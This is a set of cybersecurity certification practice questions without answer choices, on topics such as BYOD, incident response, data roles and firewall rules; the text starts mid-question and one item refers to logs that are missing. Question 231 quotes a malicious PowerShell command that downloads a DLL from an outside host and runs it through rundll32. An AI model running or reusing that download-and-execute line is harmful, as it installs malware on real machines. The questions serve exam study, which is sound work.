algorithm?





245. A company wants to enable BYOD for checking email and reviewing documents. Many of the documents contain sensitive organizational information.

Which of the following should be deployed first before allowing the use of personal devices to access company data?





221. Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself and eventually to a caged area solely for the organization's hardware.

Which of the following controls is described in this scenario?





95. A company is planning to set up a SIEM system and assign an analyst to review the logs on a weekly basis.

Which of the following types of controls is the company setting up?





64. A systems administrator set up a perimeter firewall but continues to notice suspicious connections between internal endpoints.

Which of the following should be set up in order to mitigate the threat posed by the suspicious activity?





35. A company is expanding its threat surface program and allowing individuals to security test the company's internet-facing application. The company will compensate researchers based on the vulnerabilities discovered.

Which of the following best describes the program the company is setting up?





97. A security operations center determines that the malicious activity detected on a server is normal.

Which of the following activities describes the act of ignoring detected activity in the future?





140. Malware spread across a company's network after an employee visited a compromised industry blog.

Which of the following best describes this type of attack?





29. A security administrator would like to protect data on employees laptops.

Which of the following encryption techniques should the security administrator use?





139. A company's marketing department collects, modifies, and stores sensitive customer data. The infrastructure team is responsible for securing the data while in transit and at rest.

Which of the following data roles describes the customer?





174. One of a company's vendors sent an analyst a security bulletin that recommends a BIOS update.

Which of the following vulnerability types is being addressed by the patch?





176. A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack.

Which of the following options will mitigate this issue without compromising the number of outlets available?





94. The management team notices that new accounts that are set up manually do not always have
correct access or permissions. Which of the following automation techniques should a systems administrator use to streamline account creation?





134. A systems administrator is working on a solution with the following requirements:

- Provide a secure zone.

- Enforce a company-wide access control policy.

- Reduce the scope of threats.

Which of the following is the systems administrator setting up?





318. The new Chief Information Security Officer at a company has asked the security team to implement stronger user account policies. The new policies require:

- Users to choose a password unique to their last ten passwords
- Users to not log in from certain high-risk countries

Which of the following should the security team implement? (Select two).







223. A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources.

Which of the following types of attacks is the user MOST likely experiencing?





269. While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet.

Which of the following controls would work best to reduce the risk of further exfiltration using this method?





67. A hacker gained access to a system via a phishing attempt that was a direct result of a user clicking a suspicious link. The link laterally deployed ransomware, which laid dormant for multiple weeks, across the network.

Which of the following would have mitigated the spread?





306. While reviewing the /etc/shadow file, a security administrator notices files with the same values.

Which of the following attacks should the administrator be concerned about?





116. An administrator finds that all user workstations and servers are displaying a message that is associated with files containing an extension of .ryk.

Which of the following types of infections is present on the systems?





231. An employee received an email with an unusual file attachment named "Updates.lnk". A security analyst reverse engineers what the file does and finds that it executes the following script:


C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI
https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe
$env:TEMP\autoupdate.dll


Which of the following BEST describes what the analyst 





215. A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system.

Which of the following is the CISO using to evaluate the environment for this new ERP system?





280. A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data.

Which of the following additional controls should be put in place first?





292. After installing a patch on a security appliance, an organization realized a massive data exfiltration occurred.

Which of the following describes the incident?





183. As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

- The exception process and policy have been correctly followed by the majority of users.

- A small number of users did not create tickets for the requests but were granted access.

- All access had been approved by supervisors.

- Valid requests for the access sporadically occurred across multiple departments.

- Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?





38. Employees in the research and development business unit receive extensive training to ensure they understand how to best protect company data.

Which of the following is the type of data these employees are most likely to use in day-to-day work activities?





285. Which of the following can be used to detect a hacker who is stealing company data over port 80?





257. A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information.

Which of the following roles is the company assuming?





23. During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network.

Which of the following fulfills this request?





91. An organization recently updated its security policy to include the following statement: Regular expressions are included in source code to remove special characters such as $, |, ;. &, `, and ? from variables set by forms in a web application.

Which of the following best explains the security technique the organization adopted by making this addition to the policy?





315. Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company's main gate?





112. An administrator discovers that some files on a database server were recently encrypted. The administrator sees from the security logs that the data was last accessed by a domain user.

Which of the following best describes the type of attack that occurred?





136. Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?





52. Which of the following risk management strategies should an enterprise adopt first if a legacy application is critical to business operations and there are preventative controls that are not yet implemented?





110. A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager should take?





182. Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?






190. An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained.

Which of the following roles would MOST likely include these responsibilities?






323. An organization recently released a zero-trust policy that will enforce who is able to remotely access certain data. Authenticated users who access the data must have a need to know, depending on their level of permissions.

Which of the following is the first step the organization should take when implementing the policy?





303. A junior human resources administrator was gathering data about employees to submit to a new company awards program. The employee data included job title, business phone number, location, first initial with last name, and race. Which of the following best describes this type of information?





277. Which of the following incident response phases should the proper collection of the detected IoCs and establishment of a chain of custody be performed before?





124. After a security incident, a systems administrator asks the company to buy a NAC platform.

Which of the following attack surfaces is the systems administrator trying to protect?





1. Which of the following threat actors is the most likely to be hired by a foreign government to attack critical systems located in other countries?





159. A newly identified network access vulnerability has been found in the OS of legacy IoT devices.

Which of the following would best mitigate this vulnerability quickly?





316. A company that provides an online streaming service made its customers' personal data, including names and email addresses, publicly available in a cloud storage service. As a result, the company experienced an increase in the number of requests to delete user accounts.

Which of the following best describes the consequence of this data disclosure?





68. A security engineer is implementing FDE for all laptops in an organization. Which of the following are the most important for the engineer to consider as part of the planning process? (Select two).







278. Which of the following measures the average time that equipment will operate before it breaks?





18. A security analyst is reviewing the following logs:

Which of the following attacks is most likely occurring?





130. Which of the following are cases in which an engineer should recommend the decommissioning of a network device? (Select two).







32. Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?





20. An engineer needs to find a solution that creates an added layer of security by preventing unauthorized access to internal company resources.

Which of the following would be the best solution?





88. Which of the following allows for the attribution of messages to individuals?





111. Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked. Which of the following changes would allow users to access the site?





138. Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two).







253. A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server.

Which of the following algorithms should the administrator use to split the number of the connections on each server in half?





184. Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?





4. An enterprise is trying to limit outbound DNS traffic originating from its internal network. Outbound DNS requests will only be allowed from one device with the IP address 10.50.10.25.

Which of the following firewall ACLs will accomplish this goal?





13. Which of the following provides the details about the terms of a test with a third-party penetration tester?